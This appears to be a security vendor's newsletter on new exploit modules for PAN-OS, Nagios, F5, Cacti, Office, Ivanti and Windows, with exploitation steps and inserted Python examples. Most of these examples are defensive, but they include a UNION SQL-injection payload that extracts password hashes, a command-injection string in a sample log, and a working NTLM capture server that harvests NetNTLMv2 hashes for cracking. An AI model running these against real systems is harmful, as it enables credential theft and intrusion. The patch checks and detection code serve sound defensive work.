Core Impact Monthly Chronicle: Exploits and Updates | December 2024-January 2025
Core Impact Exploit Library Additions
One of Core Impact’s most valuable features is its certified exploit library, maintained by a team (formerly Core Labs) within the Fortra Intelligence & Research Experts (FIRE) group. This team conducts in-depth research to evaluate and prioritize the most critical vulnerabilities, ensuring the library is updated with high-impact, reliable exploits that enable pen testers to use the same techniques as modern real-world threats.
In 2024 alone, the team added 85 new exploits and 13 updates, showcasing their productivity and expertise. These exploits cover a wide range of vulnerability types and platforms, providing a breadth of coverage for penetration testing scenarios.
2024 Exploit Library Highlights
[Charts: Types of Exploits | Platforms Targeted]
This data underscores the team’s commitment to providing actionable exploits that address vulnerabilities across diverse environments. We look forward to bringing you more exploits throughout 2025!
While you can keep track of new releases through our exploit mailing list, here is a more detailed summary of some of the most recent additions to the library.
Exploits From December 2024 - January 2025
CVE-2024-9474, CVE-2024-0012 - Palo Alto Networks OS (PAN-OS) Remote Code Execution Exploit
Authors: Lucas Dominikow and Nahuel Gonzalez (QA)
CVSS: 7.2 HIGH, 9.8 CRITICAL
Reference: CVE-2024-9474, CVE-2024-0012
Key Vulnerability Details
- CVE-2024-9474 – A privilege escalation vulnerability that allows authenticated attackers to execute commands with root privileges
- CVE-2024-0012 – An authentication bypass vulnerability that enables unauthenticated attackers to perform administrator actions
- When chained, the two allow unauthenticated remote code execution as root
- Affects multiple versions of PAN-OS
- Classified as Improper Neutralization of Special Elements used in an OS Command (CWE-78) and Missing Authentication for Critical Function (CWE-306)
Exploitation Impact and Mitigation
- Attackers first use CVE-2024-0012 to bypass authentication on the management web interface and obtain administrative access, then use CVE-2024-9474 to execute commands as root
- Can lead to full system compromise
- Patches have been released for both vulnerabilities in PAN-OS 11.2.4-h1, PAN-OS 11.1.5-h1, PAN-OS 11.0.6-h1, PAN-OS 10.2.12-h2, and PAN-OS 10.1.14-h6
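The fixed builds listed above are given per maintenance branch, so "is this appliance patched?" is a branch-aware version comparison rather than a string match. The following Python script, added here as an example and not part of Core Impact, parses PAN-OS version strings (major.minor.maintenance with an optional -hN hotfix suffix) and triages an inventory against that list. Later hotfixes and maintenance releases on a listed branch count as patched; branches the list does not cover are reported as unknown rather than guessed. The hostnames and versions in the sample inventory are constructed.

```python
import re

# Fixed releases named above, one per maintenance branch (the minimum patched build on each).
FIXED_VERSIONS = ["11.2.4-h1", "11.1.5-h1", "11.0.6-h1", "10.2.12-h2", "10.1.14-h6"]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(text):
    """'10.2.12-h2' -> (10, 2, 12, 2). A build with no -hN suffix gets hotfix 0, so
    10.2.12 sorts before 10.2.12-h2, matching how PAN-OS hotfixes layer on a release."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


# Branch (major, minor) -> first fixed build on that branch.
FIXED_BY_BRANCH = {v[:2]: v for v in map(parse_panos_version, FIXED_VERSIONS)}


def assess_panos(version_text):
    """Return 'patched', 'vulnerable' or 'unknown-branch' for one appliance version.
    Branches the advisory does not list are reported rather than guessed: an end-of-life
    or unlisted train needs its own check against the vendor advisory."""
    v = parse_panos_version(version_text)
    fixed = FIXED_BY_BRANCH.get(v[:2])
    if fixed is None:
        return "unknown-branch"
    return "patched" if v >= fixed else "vulnerable"


def triage(inventory):
    """inventory: {hostname: version string} -> hosts grouped by assessment."""
    groups = {"vulnerable": [], "patched": [], "unknown-branch": []}
    for host, version in inventory.items():
        groups[assess_panos(version)].append(host)
    return groups


if __name__ == "__main__":
    # Constructed inventory; hostnames and versions are illustrative only.
    sample = {"fw-dc1": "10.2.11-h3", "fw-dc2": "10.2.12-h2", "fw-branch": "11.1.5", "fw-lab": "9.1.17"}
    for state, hosts in triage(sample).items():
        print(f"{state:14s} {', '.join(hosts) or '-'}")
```

Note that "11.1.5" without the hotfix suffix is reported as vulnerable: the fix on that branch is 11.1.5-h1, and the hotfix, not the base release, carries it.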
Attacks in the Wild
- This vulnerability chain has been actively exploited since November 2024
- Both vulnerabilities have been added to CISA’s Known Exploited Vulnerabilities Catalog
Exploitation Mechanism
- The exploit module sends a request that carries the header used for the authentication bypass (CVE-2024-0012) and injects a command into the "user" request body parameter (CVE-2024-9474).
- The response returns an elevated session ID, and the injected command is written into a local session cache file.
- A second request presenting the elevated session ID triggers evaluation of that session cache file, which executes the injected command.
- The process is repeated with each command needed to deploy an agent.
Update
- This update improves the module description and messages in the Module Output panel.
CVE-2024-24401, CVE-2024-24402 - Nagios XI monitoringwizard SQL Injection Vulnerability Exploit
Authors: Fernando Páez Barceló and Nahuel Gonzalez (QA)
CVSS: 9.8 CRITICAL, 9.8 CRITICAL
Reference: CVE-2024-24401, CVE-2024-24402
Key Vulnerability Details
- CVE-2024-24401 – A SQL Injection vulnerability in the monitoringwizard.php component that allows remote attackers to execute arbitrary code through crafted payloads
- CVE-2024-24402 – A privilege escalation vulnerability that allows remote attackers to escalate privileges through crafted scripts
- When chained, the two yield remote code execution with elevated privileges
- Affects Nagios XI version 2024R1.01
- Classified as Improper Neutralization of Special Elements used in an SQL Query (CWE-89)
Exploitation Impact and Mitigation
- Attackers can gain a foothold using CVE-2024-24401, then use CVE-2024-24402 to escalate privileges
- Can lead to access to sensitive data and potential full system compromise
- Patches have been released for both vulnerabilities in Nagios XI 2024R1.0.2
Attacks in the Wild
- No major attacks have been reported at this time
Exploitation Mechanism
- The exploit module for CVE-2024-24401 sends a crafted SQL injection payload to the monitoringwizard.php component.
- Once the injection succeeds, the module uses the compromised database access to obtain command execution within the web application.
- The exploit module for CVE-2024-24402 leverages this initial access to deploy a specially crafted script targeting the /usr/local/nagios/bin/npcd component in order to elevate privileges.
- With elevated privileges, pen testers can execute system-level commands, establish persistence, and maintain access.
CVE-2024-26026 - F5 BIG-IP Next Central Manager SQL Injection Vulnerability Exploit
Authors: Marcos Accossatto and Nahuel Gonzalez (QA)
CVSS: 9.8 CRITICAL
Reference: CVE-2024-26026
Key Vulnerability Details
- An SQL injection vulnerability exists in F5 BIG-IP Next Central Manager that enables an unauthenticated attacker to execute malicious SQL statements through the BIG-IP Next Central Manager API
- BIG-IP Next Central Manager versions 20.0.1 through 20.1.0 are affected
- Classified as Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') (CWE-89) and Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Exploitation Impact and Mitigation
- Successful exploitation provides access to sensitive information, including user password hashes and the administrator's password hash
- This can lead to offline password cracking, data breaches, and possibly full control of the compromised system
- F5 fixed the vulnerability in BIG-IP Next Central Manager 20.2.0
Attacks in the Wild
- No major attacks have been reported at this time
Exploitation Mechanism
The exploit module assembles a malicious HTTP POST request containing a crafted SQL payload.
The request is sent to the BIG-IP Next Central Manager API endpoint, with the payload injected into the filter parameter.
Once injected, the SQL query retrieves username and password hash pairs from the users table.
From there, operators can crack the extracted hashes offline and use the recovered passwords to log in as those users.
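Both the Nagios XI monitoringwizard.php issue above and this filter-parameter injection are CWE-89 cases in which attacker-controlled text is spliced into a query. The following Python example, added here and not code from either product or from Core Impact, shows the pattern against an in-memory SQLite database: a UNION payload in a "name" filter returns username/password hash pairs from a users table through an endpoint that was only meant to list devices, while the parameterized form of the same query treats the payload as data. The schema, rows, table names and hash strings are constructed for the example.

```python
import sqlite3

# Constructed schema and rows: an inventory table the API is meant to expose, plus the
# users table that holds the password hashes an attacker is actually after.
SCHEMA = """
CREATE TABLE devices (id INTEGER PRIMARY KEY, name TEXT NOT NULL, address TEXT NOT NULL);
CREATE TABLE users   (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password_hash TEXT NOT NULL);
INSERT INTO devices (name, address) VALUES ('edge-01', '10.0.0.1'), ('edge-02', '10.0.0.2');
INSERT INTO users (username, password_hash) VALUES
    ('admin',    '$2b$12$constructed.admin.hash.for.the.example.only'),
    ('operator', '$2b$12$constructed.operator.hash.for.the.example');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_devices_vulnerable(conn, name_filter):
    """CWE-89: the caller's filter is spliced into the SQL text, so it can rewrite the query."""
    sql = f"SELECT name, address FROM devices WHERE name = '{name_filter}'"
    return conn.execute(sql).fetchall()


def list_devices_safe(conn, name_filter):
    """Bound parameter: the driver passes the filter as data; it can never become SQL."""
    sql = "SELECT name, address FROM devices WHERE name = ?"
    return conn.execute(sql, (name_filter,)).fetchall()


# UNION payload: the left branch matches nothing, the right branch fills the two columns the
# endpoint returns with username/password_hash pairs; the trailing "-- " comments out the
# closing quote the application appends.
UNION_PAYLOAD = "' UNION SELECT username, password_hash FROM users -- "


def demo():
    """Run the same payload through both query builders and return the rows each yields."""
    conn = open_db()
    return {
        "vulnerable": list_devices_vulnerable(conn, UNION_PAYLOAD),
        "safe": list_devices_safe(conn, UNION_PAYLOAD),
        "legit": list_devices_safe(conn, "edge-01"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:10s} {rows}")
```

The sqlite3 driver's execute() accepts a single statement, so stacked queries (a second statement after a semicolon) fail here; the UNION payload works because it stays inside the one SELECT the application issues, which is also why column count and column types must line up with the original query.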
CVE-2024-29895 - Cacti Cmd Realtime Remote Code Execution Exploit
Authors: Lucas Dominikow and Nahuel Gonzalez (QA)
CVSS: 10.0 CRITICAL
Reference: CVE-2024-29895
Key Vulnerability Details
- A command injection vulnerability that allows any unauthenticated user to execute arbitrary commands on the server when the "register_argc_argv" option of PHP is On
- The 1.3.x development branch is affected
- Classified as Improper Neutralization of Special Elements used in a Command ('Command Injection') (CWE-77)
Exploitation Impact and Mitigation
- Successful exploitation would give attacker remote code execution
- This could eventually lead to data breaches, malware deployment, and potentially complete server compromise
- Because the vulnerability affected a development version of Cacti, a fix was committed to the development branch
- That commit was later reverted, so the vulnerability remains present
- As a temporary workaround, disable the register_argc_argv PHP configuration option (register_argc_argv = Off in php.ini), which prevents exploitation
Attacks in the Wild
- No major attacks have been reported at this time
Exploitation Mechanism
Once the operator confirms that the register_argc_argv PHP option is enabled, the exploit module crafts a malicious HTTP GET request to cmd_realtime.php on the Cacti server.
Because register_argc_argv is on, PHP populates $_SERVER['argv'] from the request's query string, so the crafted URL places an OS command into the arguments cmd_realtime.php uses to build its command line.
From there, arbitrary commands can be executed to continue the engagement.
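Because register_argc_argv makes PHP build $_SERVER['argv'] from the query string split on "+", a request to cmd_realtime.php leaves a distinctive trace in web server access logs. The following Python script, added here as an example and not part of Cacti or Core Impact, reproduces that argv construction and flags cmd_realtime.php requests whose arguments contain shell metacharacters. The log lines are constructed for the example, and the metacharacter class is a starting point for a detection rule, not an exhaustive one.

```python
import re
from urllib.parse import urlsplit

# Characters that let an argv element escape the command line cmd_realtime.php assembles.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

# Combined access-log format (Apache/nginx): client, identity, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def php_argv_from_query(query):
    """With register_argc_argv On in a web request, PHP fills $_SERVER['argv'] from the
    query string split on '+'. Only that split is modelled here, so the detector sees the
    same argument boundaries the PHP script saw."""
    return query.split("+") if query else []


def suspicious_cmd_realtime_requests(log_lines):
    """Return one record per cmd_realtime.php request whose argv carries shell metacharacters."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = urlsplit(m["target"])
        if not target.path.endswith("/cmd_realtime.php"):
            continue
        argv = php_argv_from_query(target.query)
        flagged = [arg for arg in argv if SHELL_META.search(arg)]
        if flagged:
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "argv": argv, "flagged": flagged})
    return hits


# Constructed log lines (not from a real server). The second request carries a command
# substitution as the last '+'-separated argument; the first is a benign-looking call.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jan/2025:10:14:02 +0000] "GET /cacti/cmd_realtime.php?1+1+5+1+1 HTTP/1.1" 200 512 "-" "curl/8.5.0"
203.0.113.7 - - [12/Jan/2025:10:14:09 +0000] "GET /cacti/cmd_realtime.php?1+1+5+1+1+$(id>/tmp/o) HTTP/1.1" 200 77 "-" "curl/8.5.0"
198.51.100.4 - - [12/Jan/2025:10:15:31 +0000] "GET /cacti/graph_view.php?action=tree HTTP/1.1" 200 9210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in suspicious_cmd_realtime_requests(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['ip']} argv={hit['argv']} flagged={hit['flagged']}")
```

Two caveats when turning this into a production rule: cmd_realtime.php is normally invoked from the Cacti UI, so legitimate hits will have numeric arguments only, and any request to it from outside your monitoring operators' address space is worth a look even without metacharacters.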
CVE-2024-38200 - Microsoft Office Spoofing NTLMv2 Disclosure Vulnerability Exploit
Authors: Esteban Kazimirow and Nahuel Gonzalez (QA)
CVSS: 9.1 CRITICAL
Reference: CVE-2024-38200
Key Vulnerability Details
- When a targeted user opens a malicious document, clicks a link, or visits a malicious website, this spoofing vulnerability allows attackers to capture NTLMv2 hashes
- Can be remotely exploited without special privileges
- Impacted versions include the 32-bit and 64-bit editions of Microsoft Office 2016, Microsoft Office 2019, Microsoft Office LTSC 2021, and Microsoft 365 Apps for Enterprise
- Classified as Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Exploitation Impact and Mitigation
- Successful exploitation enables attackers to use NTLMv2 hashes in relay attacks to gain unauthorized access to other systems.
- This could lead to credential theft, data breaches, and potentially compromise other systems.
- Microsoft released a patch for this vulnerability in the August 2024 security update
Attacks in the Wild
- No major attacks have been reported at this time
Exploitation Mechanism
This exploit module sends an email containing a specially crafted link that points to a tester-controlled HTTP server.
When the target opens the link, Office automatically attempts to authenticate to that server.
If the user is on the trusted list, the client connects to the tester-controlled HTTP server and the operator obtains the NTLMv2 hashes.
Because the module captures the NTLMv2 response of a legitimate user rather than installing an agent, the engagement can continue with minimal chance of detection.
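The capture side of this technique is an HTTP server that answers with an NTLM challenge and records the client's Type 3 (AUTHENTICATE_MESSAGE). The following Python script, added here as an example and not the Core Impact module, implements that exchange with the standard library: it issues a fixed server challenge (a constructed value), parses the Type 3 message by its documented NTLMSSP field offsets, and formats the result as a NetNTLMv2 line for offline cracking. The client-side builder exists only to generate test input; the user, domain and workstation names and the response bytes are constructed.

```python
import base64
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

NTLMSSP = b"NTLMSSP\x00"
# Constructed 8-byte server challenge. A real capture server either randomises this per
# connection or fixes it so that every captured response shares one challenge.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
NEGOTIATE_UNICODE, NEGOTIATE_NTLM, NEGOTIATE_EXT_SESSIONSECURITY = 0x1, 0x200, 0x80000


def build_challenge_message(server_challenge=SERVER_CHALLENGE):
    """NTLMSSP CHALLENGE_MESSAGE (Type 2) with empty TargetName/TargetInfo: a 48-byte header."""
    flags = NEGOTIATE_UNICODE | 0x4 | NEGOTIATE_NTLM | 0x8000 | NEGOTIATE_EXT_SESSIONSECURITY
    return (NTLMSSP + struct.pack("<I", 2)
            + struct.pack("<HHI", 0, 0, 48)    # TargetNameFields (Len, MaxLen, Offset)
            + struct.pack("<I", flags)
            + server_challenge                 # bytes 24..31
            + b"\x00" * 8                      # Reserved
            + struct.pack("<HHI", 0, 0, 48))   # TargetInfoFields


def _field(data, pos):
    """Resolve an NTLM (Len, MaxLen, Offset) descriptor at `pos` to the payload bytes it references."""
    length, _max, offset = struct.unpack_from("<HHI", data, pos)
    return data[offset:offset + length]


def parse_authenticate_message(data, server_challenge):
    """Pull the NetNTLMv2 pieces out of an AUTHENTICATE_MESSAGE (Type 3) and format them as
    hashcat mode 5600 / john netntlmv2: USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB."""
    if data[:8] != NTLMSSP or struct.unpack_from("<I", data, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    nt_response = _field(data, 20)             # NtChallengeResponseFields
    domain_raw = _field(data, 28)              # DomainNameFields
    user_raw = _field(data, 36)                # UserNameFields
    flags = struct.unpack_from("<I", data, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    user, domain = user_raw.decode(enc), domain_raw.decode(enc)
    if len(nt_response) <= 24:
        raise ValueError("24-byte response is NTLMv1; this parser handles NTLMv2 only")
    nt_proof, blob = nt_response[:16], nt_response[16:]   # NTProofStr, then the client blob
    return {"user": user, "domain": domain,
            "netntlmv2": f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{blob.hex()}"}


def build_authenticate_message(user, domain, workstation, nt_response):
    """Client-side Type 3 builder, used here only to produce test input (constructed)."""
    flags = NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_EXT_SESSIONSECURITY
    u, d, w = (s.encode("utf-16-le") for s in (user, domain, workstation))
    header_len = 64 + 8 + 16                   # fixed fields + Version + MIC
    fields, payload = [], b""
    # Field order: LmChallengeResponse, NtChallengeResponse, DomainName, UserName, Workstation, SessionKey
    for chunk in (b"\x00" * 24, nt_response, d, u, w, b""):
        fields.append(struct.pack("<HHI", len(chunk), len(chunk), header_len + len(payload)))
        payload += chunk
    return (NTLMSSP + struct.pack("<I", 3) + b"".join(fields) + struct.pack("<I", flags)
            + b"\x00" * 24 + payload)


class NTLMCaptureHandler(BaseHTTPRequestHandler):
    """Demands NTLM on every request and logs the NetNTLMv2 line from the Type 3 message."""

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        if not auth.startswith("NTLM "):
            self._challenge("NTLM")                           # step 1: ask for NTLM
            return
        msg = base64.b64decode(auth[5:])
        if struct.unpack_from("<I", msg, 8)[0] == 1:          # step 2: Type 1 -> send Type 2
            self._challenge("NTLM " + base64.b64encode(build_challenge_message()).decode())
            return
        creds = parse_authenticate_message(msg, SERVER_CHALLENGE)   # step 3: Type 3 arrives
        self.log_message("captured %s", creds["netntlmv2"])
        self.send_response(401)                               # never grant access
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_HEAD = do_OPTIONS = do_PROPFIND = do_GET               # Office/WebDAV clients use these too

    def _challenge(self, header_value):
        self.send_response(401)
        self.send_header("WWW-Authenticate", header_value)
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), NTLMCaptureHandler).serve_forever()
```

Whether the client ever sends the Type 1 message is the control point defenders have: it depends on the server being somewhere the client is allowed to authenticate to automatically and on the host's outbound NTLM policy, which is why the mitigation guidance for this class of issue centres on restricting outgoing NTLM rather than on the HTTP server.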
SMB Pool Overflow EternalRomance Exploit Update
Authors: Alexis Balbachan and Daniel De Luca (QA)
Update
This update adapts the EternalRomance exploit to be compatible with the latest Impacket version.
CVE-2025-0282 - Ivanti Connect Secure IFT_PREAUTH_INIT clientCapabilities Buffer Overflow Remote Code Execution Exploit
Authors: Marcos Accossatto and Daniel De Luca (QA)
CVSS: 9.0 CRITICAL
Reference: CVE-2025-0282
Key Vulnerability Details
- A stack-based buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code
- A flaw exists in the IFT_PREAUTH_INIT component, causing improper handling of client capabilities during the pre-authentication phase
- Multiple versions of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA gateways are impacted
- Classified as Out-of-bounds Write (CWE-787) and Stack-based Buffer Overflow (CWE-121)
Exploitation Impact and Mitigation
- Successful exploitation enables unauthenticated remote attackers to fully compromise the Ivanti Connect Secure appliance
- This could potentially lead to data breaches, malware deployment, network disruption, and complete system takeover
- Ivanti released a patch for this vulnerability in a January 2025 security update
Attacks in the Wild
- This vulnerability has been actively exploited since December 2024
- CISA has released mitigation instructions for this vulnerability and added it to the Known Exploited Vulnerabilities Catalog
Exploitation Mechanism
The exploit module first confirms that the target is an Ivanti Connect Secure appliance by fingerprinting the service and analyzing its response characteristics.
It then retrieves the appliance's version number to verify that it falls within the vulnerable range.
To locate the base address of the libdsplibs.so library, the module registers a random endpoint on its local web server to serve as a callback oracle.
It then brute-forces the base address, iteratively testing candidate addresses within a calculated range: for each candidate it crafts a payload that attempts to run a cURL command against the registered endpoint, and the candidate that produces a callback is the correct one.
Once the base address of libdsplibs.so is known, the vulnerability is triggered one more time to deploy an agent.
CVE-2024-38193 - Microsoft Windows Ancillary Function Driver UAF Privilege Escalation Exploit
Authors: Esteban Kazimirow and Arthur Lallemant (QA)
CVSS: 7.8 HIGH
Reference: CVE-2024-38193
Key Vulnerability Details
- A race-condition vulnerability in the Windows Ancillary Function Driver for WinSock (Afd.sys) allows attackers to escalate privileges on affected systems
- A flaw exists in the Afd.sys module that improperly handles a temporary reference counter increment during buffer management
- Multiple versions of Windows 10, Windows 11, and Windows Server are impacted
- Classified as Use After Free (CWE-416)
Exploitation Impact and Mitigation
- Successful exploitation enables attackers to bypass standard access controls, granting them access to sensitive system areas
- This could potentially lead to data breaches, malware deployment, network disruption, and complete system takeover
- Microsoft released a patch for this vulnerability in a security update in August 2024
Attacks in the Wild
- This vulnerability has been actively exploited, most notably by the Lazarus APT group
- Added to CISA’s Known Exploited Vulnerabilities Catalog
Exploitation Mechanism
- The exploit module corrupts kernel structures to trigger the vulnerability.
- Leveraging the corrupted structures, the exploit will gain arbitrary read/write primitives in kernel memory.
- The module will then steal a system token from another process to escalate privileges to SYSTEM level
- To avoid detection and ensure stability, the exploit repairs the corrupted kernel structures, restoring the system to a seemingly normal state.
- The module will lastly spawn a new agent process running with SYSTEM privileges.